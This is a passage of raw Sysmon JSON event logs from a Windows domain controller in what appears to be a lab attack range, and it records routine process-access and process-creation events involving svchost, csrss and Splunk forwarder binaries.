08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6189,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6190,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.382\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2165-5F25-0000-001081810900}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.382","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2165-5F25-0000-001081810900}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6191,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:41.522\r\nSourceProcessGUID: {41C8662E-2165-5F25-0000-001081810900}\r\nSourceProcessId: 4544\r\nSourceThreadId: 4620\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:41.522","SourceProcessGUID":"{41C8662E-2165-5F25-0000-001081810900}","SourceProcessId":"4544","SourceThreadId":"4620","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6192,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.054\r\nProcessGuid: {41C8662E-2166-5F25-0000-001061830900}\r\nProcessId: 3948\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.054","ProcessGuid":"{41C8662E-2166-5F25-0000-001061830900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6193,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2166-5F25-0000-001061830900}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2166-5F25-0000-001061830900}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6194,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2166-5F25-0000-001061830900}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2166-5F25-0000-001061830900}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 